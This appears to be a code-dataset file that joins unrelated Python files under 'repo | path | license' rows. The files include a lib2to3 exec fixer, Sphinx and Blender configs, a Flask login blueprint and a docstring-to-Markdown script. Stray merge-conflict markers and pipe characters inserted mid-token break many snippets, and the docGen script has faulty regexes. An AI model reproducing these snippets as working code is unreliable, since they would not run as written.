>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for exec.
This converts usages of the exec statement into calls to a built-in
exec() function.
exec code in ns1, ns2 -> exec(code, ns1, ns2)
"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Comma, Name, Call
class FixExec(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
exec_stmt< 'exec' a=any 'in' b=any [',' c=any] >
|
exec_stmt< 'exec' (not atom<'(' [any] ')'>) a=any >
"""
def transform(self, node, results):
assert results
syms = self.syms
a = results["a"]
b = results.get("b")
c = results.get("c")
args = [a.clone()]
args[0].prefix = ""
if b is not None:
args.extend([Comma(), b.clone()])
if c is not None:
args.extend([Comma(), c.clone()])
return Call(Name("exec"), args, prefix=node.prefix)
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
|
rowinggolfer/openmolar2 | configure.py | Python | gpl-3.0 | 6,157 | 0.012993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
## ##
## Copyright 2011-2012, Neil Wallace <neil@openmolar.com> ##
## ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## (at your option) any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
###############################################################################
import __builtin__
import ConfigParser
import logging
import optparse
import os
import StringIO
import sys
from version_number import VERSION_NUMBER
import version_manager
version_manager.main()
sys.path.insert(0, os.path.abspath("src"))
logging.basicConfig(level=logging.ERROR)
class OMConfig(ConfigParser.RawConfigParser):
'''
subclass RawConfigParser with default values and an overwrite of the write
function so that a nice header is included
'''
HEADER = '''
# As openmolar is a suite of applications with a common source code directory
# some configuration is required before running setup.py
#
# setup.py is capable of installing any combination of
# common, admin, server, client, language "packages"
#
# or creating a pure source distribution for that element
#
'''
DICT = {"namespace":'False',
"common": 'False',
"client": 'False',
"admin" : 'False',
"server": 'False',
"lang" : 'False'}
ATTS = DICT.keys()
def __init__(self):
ConfigParser.RawConfigParser.__init__(self)
for att in self.ATTS:
self.add_section(att)
self.set(att, "include", self.DICT[att])
self.set(att, "version", VERSION_NUMBER)
try:
if att not in ("namespace", "lang"):
# this is the equiv of
# from admin import version
logging.debug("getting version for %s"% att)
version = __import__("lib_openmolar.%s.version"% att, fromlist=["version"])
self.set(att, "revision_number", version.revision_number)
self.set(att, "revision_id", version.revision_id)
try:
__builtin__.__dict__.pop("LOGGER")
__builtin__.__dict__.pop("SETTINGS")
except KeyError:
pass
except ImportError:
logging.exception(
"IMPORT ERROR - hg generated version files not present for package %s"% att)
sys.exit("version files not present. Unable to proceed")
def write(self, f):
'''
re-implement write so that our header is included
'''
f.write(self.HEADER)
ConfigParser.RawConfigParser.write(self, f)
class Parser(optparse.OptionParser):
def __init__(self):
optparse.OptionParser.__init__(self)
option = self.add_option("-n", "--namespace",
dest = "namespace",
action="store_true", default=False,
help = "package or install sources fo | r the namespace"
)
option = self.add_option("-a", "--admin",
dest = "admin",
action="store_true", default=False,
help = "pa | ckage or install sources for the admin application"
)
option = self.add_option("-c", "--client",
dest = "client",
action="store_true", default=False,
help = "package or install sources for the client application"
)
option = self.add_option("-l", "--lang",
dest = "lang",
action="store_true", default=False,
help = "package or install sources for the language pack"
)
option = self.add_option("-o", "--common",
dest = "common",
action="store_true", default=False,
help = "package or install sources for lib_openmolar.common"
)
option = self.add_option("-s", "--server",
dest = "server",
action="store_true", default=False,
help = "package or install sources for the server application"
)
def manual_select(options):
print "please choose from the following"
for att in OMConfig.ATTS:
result = raw_input("Include %s (Y/n)"% att)
options.__dict__[att] = str(result.lower() in ("y", ""))
if __name__ == "__main__":
parser = Parser()
options, args = parser.parse_args()
if parser.values == parser.defaults:
try:
manual_select(options)
except:
parser.print_help()
sys.exit("nothing to do")
config = OMConfig()
for att in config.ATTS:
config.set(att, "include", options.__dict__[att])
f = open("setup.cnf", "w")
config.write(f)
f.close()
|
mawenbao/pelican-blog-content | plugins/summary/summary.py | Python | bsd-3-clause | 1,503 | 0.002001 | # -*- encoding: UTF-8 -*-
from __future__ import unicode_literals
from HTMLParser import HTMLParser
from pelican import signals, contents
_MAX_SUMMARY_POS = 45
class FirstParagraphParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.paragraphTag = 'p'
self.data = ''
self.currTags = []
def handle_starttag(self, tag, attrs):
if not self.data and self.paragraphTag == tag.lower():
self.currTags.append('p')
elif self.currTags:
self.currTags.append(tag)
def handle_endtag(self, tag):
if self.currTags:
self.currTags.pop()
def handle_data(self, data):
if self.currTags:
self.data += data
def content_object_init(instance):
if isinstance(instance, contents.Static):
return
if 'summary' in instance.metadata:
return
if not hasattr(instance, '_summary') and instance._content is not None:
| content = instance._content
firstP = FirstParagraphParser()
firstP.feed(content)
endCharA = '。'
endCharB = '.'
endPosA = firstP.data.find(endCharA)
endPosB = firstP.data.find(endCharB)
endPos = min(max(endPosA, endPosB), _MAX_SUMMARY_POS)
instance._summary = firstP.data[:endPos + 1 if endPos > 0 else None]
if endPos == _MAX_SUMMARY_POS:
instance._summary += ' …'
def register():
signals.content_object_init.connect(c | ontent_object_init)
|
NikolausDemmel/catkin_tools | docs/conf.py | Python | apache-2.0 | 8,535 | 0.005272 | # -*- coding: utf-8 -*-
#
# catkin_tools documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 24 18:03:21 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# import sys
# import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'catkin_tools'
copyright = u'2014, Open Source Robotics Foundation, Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0'
# The full version, including alpha/beta/rc tags.
release = '0.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of S | phinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static pa | th) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'catkin_toolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'catkin_tools.tex', u'catkin\\_tools Documentation',
u'William Woodall', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'catkin_tools', u'catkin_tools Documentation',
[u'William Woodall'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'catkin_tools', u'catkin_tools Documentation',
u'William Woodall', 'catkin_tools', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo |
hacktyler/hacktyler_crime | sirens/urls.py | Python | mit | 250 | 0.008 | #!/usr/bin/en | v python
from django.conf.urls.defaults import patterns, url
from sirens import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^pusher/auth$', views.pusher_user_auth, name='pusher_user_auth') |
)
|
Microvellum/Fluid-Designer | win64-vc/2.78/scripts/addons/cycles/__init__.py | Python | gpl-3.0 | 3,600 | 0.001667 | #
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache | .org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the | License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# <pep8 compliant>
bl_info = {
"name": "Cycles Render Engine",
"author": "",
"blender": (2, 76, 0),
"location": "Info header, render engine menu",
"description": "Cycles Render Engine integration",
"warning": "",
"wiki_url": "https://www.blender.org/manual/render/cycles/index.html",
"tracker_url": "",
"support": 'OFFICIAL',
"category": "Render"}
import bpy
from . import (
engine,
version_update,
)
class CyclesRender(bpy.types.RenderEngine):
bl_idname = 'CYCLES'
bl_label = "Cycles Render"
bl_use_shading_nodes = True
bl_use_preview = True
bl_use_exclude_layers = True
bl_use_save_buffers = True
bl_use_spherical_stereo = True
def __init__(self):
self.session = None
def __del__(self):
engine.free(self)
# final render
def update(self, data, scene):
if not self.session:
if self.is_preview:
cscene = bpy.context.scene.cycles
use_osl = cscene.shading_system and cscene.device == 'CPU'
engine.create(self, data, scene,
None, None, None, use_osl)
else:
engine.create(self, data, scene)
else:
engine.reset(self, data, scene)
def render(self, scene):
engine.render(self)
def bake(self, scene, obj, pass_type, pass_filter, object_id, pixel_array, num_pixels, depth, result):
engine.bake(self, obj, pass_type, pass_filter, object_id, pixel_array, num_pixels, depth, result)
# viewport render
def view_update(self, context):
if not self.session:
engine.create(self, context.blend_data, context.scene,
context.region, context.space_data, context.region_data)
engine.update(self, context.blend_data, context.scene)
def view_draw(self, context):
engine.draw(self, context.region, context.space_data, context.region_data)
def update_script_node(self, node):
if engine.with_osl():
from . import osl
osl.update_script_node(node, self.report)
else:
self.report({'ERROR'}, "OSL support disabled in this build.")
def engine_exit():
engine.exit()
def register():
from . import ui
from . import properties
from . import presets
import atexit
# Make sure we only registered the callback once.
atexit.unregister(engine_exit)
atexit.register(engine_exit)
engine.init()
properties.register()
ui.register()
presets.register()
bpy.utils.register_module(__name__)
bpy.app.handlers.version_update.append(version_update.do_versions)
def unregister():
from . import ui
from . import properties
from . import presets
import atexit
bpy.app.handlers.version_update.remove(version_update.do_versions)
ui.unregister()
properties.unregister()
presets.unregister()
bpy.utils.unregister_module(__name__)
|
jmluy/xpython | exercises/practice/custom-set/.meta/example.py | Python | mit | 1,184 | 0 | class CustomSet:
def __init__(self, elements=None):
self.elements = list(elements) if elements is not None else list([])
def isempty(self):
return no | t self.elements
def __iter__(self):
return iter(self.elements)
def __contains__(self, element):
return element in self.elements
def issubset(self, other):
return all(idx in other for idx in self)
def isdisjoint(self, other):
return all(idx not in other | for idx in self)
def __eq__(self, other):
return self.issubset(other) and other.issubset(self)
def add(self, element):
if element not in self:
self.elements.append(element)
def intersection(self, other):
result = CustomSet()
for idx in self:
if idx in other:
result.add(idx)
return result
def __sub__(self, other):
result = CustomSet()
for idx in self:
if idx not in other:
result.add(idx)
return result
def __add__(self, other):
result = CustomSet(self.elements)
for idx in other:
result.add(idx)
return result
|
openego/dingo | ding0/core/network/cable_distributors.py | Python | agpl-3.0 | 2,143 | 0.007933 | """This file is part of DING0, the DIstribution Network GeneratOr.
DING0 is a tool to generate synthetic medium and low voltage power
distribution grids based on open data.
It is developed in the project open_eGo: https://openegoproject.wordpress.com
DING0 lives at github: https://github.com/openego/ding0/
The documentation is available on RTD: http://ding0.readthedocs.io"""
__copyright__ = "Reiner Lemoine Institut gGmbH"
__license__ = "GNU Affero General Public License Version 3 (AGPL-3.0)"
__url__ = "https://github.com/openego/ding0/blob/master/LICENSE"
__author__ = "nesnoj, gplssm"
from . import CableDistributorDing0
class MVCableDistributorDing0(CableDistributorDing0):
""" MV Cable distributor (connection point)
Attributes
----------
lv_load_area_group :
Description #TODO
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.lv_load_area_group = kwargs.get('lv_load_area_group', None)
self.id_db = self.grid.cable_distributors_count() + 1
@property
def pypsa_id(self):
""" :obj:`str`: Returns ...#TODO
"""
return | '_'.join(['MV', str(self.grid.id_db),
'cld', str(self.id_db)])
def __repr__(self):
return 'mv_cable_dist_' + repr(self.grid) + '_' + str(self.id_db)
class LVCableDistributorDing0(CableDistributorDing0):
""" LV Cable distributor (connection point)
Attributes
----------
string_id :
Description #TODO
branch_no :
Description #TODO
load_no :
| Description #TODO
in_building :
Description #TODO
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.string_id = kwargs.get('string_id', None)
self.branch_no = kwargs.get('branch_no', None)
self.load_no = kwargs.get('load_no', None)
self.id_db = self.grid.cable_distributors_count() + 1
self.in_building = kwargs.get('in_building', False)
def __repr__(self):
return 'lv_cable_dist_' + repr(self.grid) + '_' + str(self.id_db)
|
michaelchu/kaleidoscope | kaleidoscope/options/iterator/option_chain.py | Python | mit | 849 | 0 | from kaleidoscope.event import DataEvent
from kaleidoscope.options.option_query import OptionQuery
class O | ptionChainIterator(object):
def __init__(self, data):
self.data = data
# get all quote dates that can be iterated
self.dates = sorted(data['quote_date'].unique())
# turn list of dates into an iterable
self.dates = iter(self.dates)
def __iter__(self):
return self
def __next__(self):
try:
df = self.data
quote_date = next(self.dates)
# return a data event containing the daily quote for option chains
| option_chains = df.loc[df['quote_date'] == quote_date]
# create the data event and return it
return DataEvent(quote_date, OptionQuery(option_chains))
except StopIteration:
raise
|
flav-io/flavio | flavio/functions.py | Python | mit | 13,966 | 0.00222 | """Main functions for user interaction. All of these are imported into the
top-level namespace."""
import | flavio
import numpy as np
from collections import defaultdict
from multiprocessing import Pool
from functools import partial
import warnings
def np_prediction(obs_name, wc_obj, *args, **kwargs):
"""Get the central value of the new physics prediction of an observable.
Parameters
----------
- `obs_name | `: name of the observable as a string
- `wc_obj`: an instance of `flavio.WilsonCoefficients`
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
return obs.prediction_central(flavio.default_parameters, wc_obj, *args, **kwargs)
def sm_prediction(obs_name, *args, **kwargs):
"""Get the central value of the Standard Model prediction of an observable.
Parameters
----------
- `obs_name`: name of the observable as a string
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
return obs.prediction_central(flavio.default_parameters, wc_sm, *args, **kwargs)
def _obs_prediction_par(par, obs_name, wc_obj, *args, **kwargs):
obs = flavio.classes.Observable.get_instance(obs_name)
return obs.prediction_par(par, wc_obj, *args, **kwargs)
from functools import partial
def np_uncertainty(obs_name, wc_obj, *args, N=100, threads=1, **kwargs):
"""Get the uncertainty of the prediction of an observable in the presence
of new physics.
Parameters
----------
- `obs_name`: name of the observable as a string
- `wc_obj`: an instance of `flavio.WilsonCoefficients`
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainty returned is given by $1/\sqrt{2N}$.
- `threads` (optional): if bigger than one, number of threads for parallel
computation of the uncertainty.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
par_random = flavio.default_parameters.get_random_all(size=N)
par_random = [{k: v[i] for k, v in par_random.items()} for i in range(N)]
if threads == 1:
# not parallel
all_pred = np.array([_obs_prediction_par(par, obs_name, wc_obj, *args, **kwargs) for par in par_random])
else:
# parallel
pool = Pool(threads)
# convert args to kwargs
_kwargs = kwargs.copy()
obs_args = flavio.Observable[obs_name].arguments
for i, a in enumerate(args):
_kwargs[obs_args[i]] = a
all_pred = np.array(
pool.map(
partial(_obs_prediction_par,
obs_name=obs_name, wc_obj=wc_obj, **_kwargs),
par_random))
pool.close()
pool.join()
return np.std(all_pred)
def sm_uncertainty(obs_name, *args, N=100, threads=1, **kwargs):
"""Get the uncertainty of the Standard Model prediction of an observable.
Parameters
----------
- `obs_name`: name of the observable as a string
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainty returned is given by $1/\sqrt{2N}$.
- `threads` (optional): if bigger than one, number of threads for parallel
computation of the uncertainty.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
wc_sm = flavio.physics.eft._wc_sm
return np_uncertainty(obs_name, wc_sm, *args, N=N, threads=threads, **kwargs)
class AwareDict(dict):
"""Generalization of dictionary that adds the key to the
set `akeys` upon getting an item."""
def __init__(self, d):
"""Initialize the instance."""
super().__init__(d)
self.akeys = set()
self.d = d
def __getitem__(self, key):
"""Get an item, adding the key to the `pcalled` set."""
self.akeys.add(key)
return dict.__getitem__(self, key)
def __copy__(self):
cp = type(self)(self.d)
cp.akeys = self.akeys
return cp
def copy(self):
return self.__copy__()
class AwareWilson(flavio.WilsonCoefficients):
"""Subclass of `flavio.WilsonCoefficients` that adds the arguments of calls
to its `match_run` method to `atuples` attribute."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.atuples = set()
def match_run(self, scale, eft, basis, sectors='all'):
self.atuples.add((scale, eft, basis, sectors))
return super().match_run(scale, eft, basis, sectors)
def get_dependent_parameters_sm(obs_name, *args, **kwargs):
"""Get the set of parameters the SM prediction of the observable depends on."""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
par_central = flavio.default_parameters.get_central_all()
apar_central = AwareDict(par_central)
obs.prediction_par(apar_central, wc_sm, *args, **kwargs)
# return all observed keys except the ones that don't actually correspond
# to existing parameter names (this might happen by user functions modifying
# the dictionaries)
return {p for p in apar_central.akeys
if p in flavio.Parameter.instances.keys()}
def get_dependent_wcs(obs_name, *args, **kwargs):
"""Get the EFT, basis, scale, and sector of Wilson coefficients
the NP prediction of the observable depends on.
Returns a set of tuples of the form
`(scale, eft, basis, sectors)`,
where sectors is a tuple of WCxf sectors or 'all'.
Note that this function simply checks the arguments with which the
`match_run` method of the underlying `wilson.Wilson` instance is called.
Thus it is only guaranteed that the Wilson coefficients the observable
actually depends on are contained in these sectors."""
awc = AwareWilson()
# need at least one non-zero WC to make sure match_run is called at all
awc.set_initial({'G': 1e-30}, 91.1876, 'SMEFT', 'Warsaw')
np_prediction(obs_name, awc, *args, **kwargs)
return awc.atuples
def sm_error_budget(obs_name, *args, N=50, **kwargs):
"""Get the *relative* uncertainty of the Standard Model prediction due to
variation of individual observables.
Parameters
----------
- `obs_name`: name of the observable as a string
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainties returned is given by $1/\sqrt{2N}$.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
par_central = flavio.default_parameters.get_central_all()
par_random = [flavio.default_parameters.get_random_all() for i in range(N)]
pred_central = obs.prediction_par(par_central, wc_sm, *args, **kwargs)
# Step 1: determine the parameters the observable depends on at all.
dependent_par = get_dependent_parameters_sm(obs_name, *args, **kwargs)
# Step 2: group parameters if correlated
par_constraint = {p: id(flavio.default_parameters._parameters[p][1]) for p in dependent_par}
v = defaultdict(list)
for key, value in par_constraint.items():
v[value].append(key)
dependent_par_lists = list(v.values())
# Step 3: for each of the (groups of) dependent parameters, determine the error
# analogous to the sm_uncertainty function. Normalize to the central
# prediction (so relative errors are returned)
individual_errors = {}
def make_par_random(keys, par_random):
par_tmp = par_central.copy()
for key in keys:
par_tmp[key] = par_random[key]
return par_tmp
for p in dep |
looker-open-source/sdk-codegen | examples/python/lookersdk-flask/app/auth.py | Python | mit | 2,667 | 0.001125 | import functools
import os
import flask
import werkzeug.security
from .db import get_db
from .looker import get_my_user
bp = flask.Blueprint("auth", __name__, url_prefix="/auth")
@bp.route("/register", methods=("GET", "POST"))
def register():
if flask.request.method == "POST":
username = flask.request.form["username"]
password = flask.request.form["password"]
db = get_db()
error = None
if not username:
error = "Username is required."
elif not password:
error = "Password is required."
elif (
db.execute("SELECT id FROM user WHERE username = ?", (username,)).fetchone()
is not None
):
error = "User {} is already registered.".format(username)
if error is None:
db.execute(
"INSERT INTO user (username, password) VALUES (?, ?)",
(username, werkzeug.security.generate_password_hash(password)),
)
db.commit()
flask.flash("Successfully registered. You may now log in.")
return flask.redirect(flask.url_for("auth.login"))
flask.flash(error)
return flask.render_template("auth/register.html")
@bp.route("/login", methods=("GET", "POST"))
| def login():
if flask.request.method == "POST":
username = flask.request.form["usern | ame"]
password = flask.request.form["password"]
db = get_db()
error = None
user = db.execute(
"SELECT * FROM user WHERE username = ?", (username,)
).fetchone()
if user is None:
error = "Incorrect username."
elif not werkzeug.security.check_password_hash(user["password"], password):
error = "Incorrect password."
if error is None:
flask.session.clear()
flask.session["user_id"] = user["id"]
flask.session["user_name"] = user["username"]
return flask.redirect(flask.url_for("index"))
flask.flash(error)
return flask.render_template("auth/login.html")
# This fires before every request and loads in the looker base URL to be available in the header
@bp.before_app_request
def load_instance():
flask.session["lookerurl"] = os.environ.get("LOOKERSDK_BASE_URL")
@bp.route("/logout")
def logout():
flask.session.clear()
return flask.redirect(flask.url_for("index"))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if flask.session["user_id"] is None:
return flask.redirect(flask.url_for("auth.login"))
return view(**kwargs)
return wrapped_view
|
anshulthakur/ClusterManager | src/docGen.py | Python | gpl-2.0 | 8,148 | 0.026141 | """
A script to extract description from my Code into MD format, for documentational purpose
Source format:
/**STRUCT+********************************************************************/
/* Structure: HM_NOTIFICATION_CB */
/* */
/* Name: hm_notification_cb */
/* */
/* Textname: Notification Control Block */
/* */
/* Description: A Notification Event which needs to be processed. This would */
/* be used differently in different perspectives. The same notification can */
/* be used to broadcast an update to the peers and a notification to the */
/* subscribed nodes. */
/* */
/*****************************************************************************/
typedef struct hm_notification_cb
{
/***************************************************************************/
/* Node in list */
/***************************************************************************/
HM_LQE node;
/***************************************************************************/
/* Notification Type */
/***************************************************************************/
uint16_t notification_type;
/***************************************************************************/
/* Affected CB */
/***************************************************************************/
void *node_cb;
/***************************************************************************/
/* Notification State: User specific. */
/***************************************************************************/
void *custom_data;
} HM_NOTIFICATION_CB ;
/**STRUCT-********************************************************************/
Target Format:
1. <Structure Name>(HM_NOTIFICATION_CB)
**Purpose**: <Description>
**Structure**:
```
typedef...
```
**Information**:
| Field | description |
|-------------------|---------------------------|
|node | Node in list |
|notification_type | Notification typedef|
|node_cb | Affected CB |
| custom_data | Notification State: User specific. |
"""
import sys
import os
import re
class Error(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return str(self.msg)
class Structure(object):
def __init__(self):
self.name = None #Name of structure
self.purpose = None # Description field
self.structure = None #Code, sans its comments
self.information = {} #Dictionary
## ******************** REGEXES ******************** ##
struct_start_re = re.compile(r'^.*\*STRUCT\+\**')
struct_name = re.compile(r'^.*Structure:\s?(?P<name>\w)\s?\*/')
struct_purpose = re.compile(r'^.*Description:\s?(?P<descr>\w)\s?\*/')
struct_purpose_line = re.compile(r' | ^/\*\s?(?P<line>.*)\*/')
struct_comment_boundary = re.compile(r'^/\*(\*)+\*/')
struct_start = re.compile(r'^\s?(?P<line>typedef\s+struct\s+\w+.*)')
struct_var_declaration = re.compile(r'^\s*(?P<type>\w)\s+(?P<var_name>\w)\s?;.*')
struct_end = re.compile(r'^\s?(}\s+(?P<name>\w)\s?;)')
struct_end_re = re.compile(r'\*STRUCT-')
## ******************** MAIN CODE ******************** ##
if len(sys.argv) is not 2:
raise Error("No file specified.")
if no | t sys.argv[1].endswith('.h'):
raise Error("Specified file is not a header file.")
fd = open(sys.argv[1], 'r')
md_target = open('conv.md', 'w')
line_num = 0
#We have the file opened. Now read it line by line and look for beginning of structures:
looking_for_struct_start = True
finding_purpose = False
finding_info = False
current_info = ''
while 1:
line = fd.readline()
line_num +=1
if not line:
print "End of file reached."
exit()
#Are we looking for a new structure to add, or are we making an old one
if looking_for_struct_start:
match= struct_start_re.match(line)
if match is not None:
#Found structure start
print(line)
struct = Structure()
looking_for_struct_start = False
else:
if struct.name is None:
match = struct_name.match(line)
if match is not None:
struct.name = match.group('name')
continue
if struct.purpose is None or finding_purpose is True:
if struct.purpose is None:
match = struct_purpose.match(line)
if match is not None:
struct.purpose = match.group('descr')
finding_purpose = True
continue
if finding_purpose:
match = struct_comment_boundary.match(line)
if match is not None:
match = struct_purpose_line.match(line)
if match is not None:
struct.purpose += match.group('line')
continue
else:
#We've found our purpose
finding_purpose = False
continue
if not struct.information: #Empty dictionary
#start looking for information
match = struct_start.match(line)
if match is not None:
finding_info = True
struct.structure = match.group('line')
continue
if finding_info is True:
#We're parsing the code segment now.
#Search for comments before declarations
match = struct_comment_boundary.match(line)
if match is not None:
parsing_info = True
while parsing_info is True:
line = fd.readline()
line_num +=1
match = struct_comment_boundary.match(line)
if match is not None:
if len(current_info) is 0:
raise Error('Empty comment column at line {line}'.format(line=line_num))
else:
parsing_info = False
continue
match = struct_purpose_line.match(line)
if match is not None:
current_info += match.group('line')
continue
#Search for declarations. Add them to code
match = struct_var_declaration.match(line)
if match is not None:
struct.structure += '\n'
struct.structure += line
struct.information[match.group('var_name')] = current_info
continue
#Search for end of structure
match = struct_end.match(line)
if match is not None:
struct.structure += '\n'
struct.structure +=line
finding_info = False
current_info = ''
continue
#If it is none of these, just add it to the structure
struct.structure += '\n'
struct.structure +=line
continue
match = struct_end_re.match(line)
if match is not None:
looking_for_struct_start = True
#Write the structure as markdown
'''
1. <Structure Name>(HM_NOTIFICATION_CB)
**Purpose**: <Description>
**Structure**:
```
typedef...
```
**Information**:
| Field | description |
|-------------------|---------------------------|
|node | Node in list |
|notification_type | Notification typedef|
|node_cb | Affected CB |
| custom_data | Notification State: User specific. |
'''
md_target.write('1. {name}'.format(name=struct.name))
print('1. {name}'.format(name=struct.name))
